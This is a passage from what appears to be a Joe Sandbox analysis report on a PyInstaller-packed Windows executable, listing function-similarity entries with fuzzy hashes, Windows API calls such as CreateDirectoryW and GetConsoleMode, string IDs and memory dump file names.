                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60414562B1D7C587E714CB2EE060BAA7BA0EB467C0F004175EAAE4779ACB3DD405C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007
                                                                                                                                                                                                                                • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                • Opcode ID: df38dbacce64862afa0680bc413e1b11140b6e2546048526193d0fc8ec849a9d
                                                                                                                                                                                                                                • Instruction ID: 37c193cca530c591b775e7d3c8370499c622f176b953cc9ede325337f184d3bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df38dbacce64862afa0680bc413e1b11140b6e2546048526193d0fc8ec849a9d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4541E567F0AB8380FB55AB2594A4BBD23A4EF40B94F180734DD7D9B6DDDF2CA4419210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF64487352C,?,00000000,00007FF644873F1B), ref: 00007FF644877F32
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                • Instruction ID: 570cc693dccab748ba75edfcd3add18504b94ead668c671b8dee13190dde80b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C31872171DAC149FA61BB11ECA17AA6294FB84BE4F440231EE6D87BCDDE2CE645C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction ID: 5ef64e4ba75940d2785d09b4e2bd5248f874b82a868590e140cf925209afb576
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80217F62B0CB4196E710BB54B8967AA63A4FB88784F404136EE8D97659EF3CD245C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction ID: eed41a1321574293fa4bb704efeaa59c7f01b00ccf3a77dafb9d5160e58d5464
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23D1E172B1CA818DE711EF69D4812AC37A1FB65B98B444236DE5ED7B8DDE38D41AC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1405196051-0
                                                                                                                                                                                                                                • Opcode ID: 0f453df6e1cdd23ca4e5983e4c2c4cfeba04ca82ce74fc5dc41d7678ab95377b
                                                                                                                                                                                                                                • Instruction ID: f2e21e34419b0df6c9ba6425e520dbf2dc24796be64174e5b82b464704bc3ac6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f453df6e1cdd23ca4e5983e4c2c4cfeba04ca82ce74fc5dc41d7678ab95377b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D391AD72B09746A6EB699A129160A2977B0FF45BE0F085774EE7D0B7C9EF3CE4118700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D07C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D107
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction ID: 5c65de6c93bbf58159ffcbd566a08658796fc6587735b1be415a64b3287ab632
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9919032E1C6528DF760BF6594C22BD6BE0BB54B88F145139DE0EA6A9DDF38E446C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction ID: c3c9967bac5b45d08fd19d6a38c68faefe2a287d065003f59dee31030e702ab2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51A672F085118EEB14FF6499E66BC2765AF54369F500235DE1E92AEADF3CE442C600
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction ID: 91ef1a346178f1b4215449e647d744ae0f94e7b1c4b2e4dc143589f49324fc34
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D514922E086458EFB10FFB1D4923BE27A1BB88B98F148935DE0D9B689DF38D4519740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1405196051-0
                                                                                                                                                                                                                                • Opcode ID: 65c167b629d3beafb1ba237e326e94310d99c22fee7a7913818827570b6759f6
                                                                                                                                                                                                                                • Instruction ID: 828ef19d08c3ebaa426a1ecb69d7b3754a94a6437d36952273e13239f9f767ea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65c167b629d3beafb1ba237e326e94310d99c22fee7a7913818827570b6759f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC21C166B1974283D764AB16B5515BEA3A1FF497C0B085130EFDE8BFAACF2CE0408700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction ID: a73301727956a14f1d39932d440ae04c9602998f35d50b685e71cc81e6548ac6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C110C21F0C54286F654B7A9E9D62799292FFC57C0F444030DF4947B9ECD3DE4D59210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                • Instruction ID: be3ee30887ca8f0029d80316d1a4bcd3172d651a97e36280038bccd9643483fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73112E36B14F018AEB00CF60EC646B933A4FB19758F441E31DA6D4ABA8DF78E1548381
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction ID: 5b4465ad599c622c6c306571a197281bc630650e0555362a133ebd215f61e20f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6110A22B18F05CAEB00AB60E8952B933A4FB59B58F441E31DE6D86BA8DF78D1548340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                • API String ID: 1405196051-2410398255
                                                                                                                                                                                                                                • Opcode ID: ffd83403d962cb9622be468eb35632afa7cd7601ff9c824643abc7a704723041
                                                                                                                                                                                                                                • Instruction ID: 6bacf44a3bb805746c3a46dc6dde3e3503561a24cf96ea278537a2744fbe411b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffd83403d962cb9622be468eb35632afa7cd7601ff9c824643abc7a704723041
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBC1FB22F0966382FB289A25C560B7C6790EF11794F08C675EB6E5B7DDEF2CE4458310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                                                • API String ID: 1405196051-2803948771
                                                                                                                                                                                                                                • Opcode ID: ee11977c9bbd5640f85a55ce44c5accef6eb3f1d27a3fd4689aa64be97da6381
                                                                                                                                                                                                                                • Instruction ID: e4dded0dd8e844c613ceebdfc174dcd47765cdf33a8308cb737d89c736d83580
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee11977c9bbd5640f85a55ce44c5accef6eb3f1d27a3fd4689aa64be97da6381
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F91CD21F0D20385FB6C9B01D564B7927A0AF81BA4F084279EE6D0B3DADE3DEA418741
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
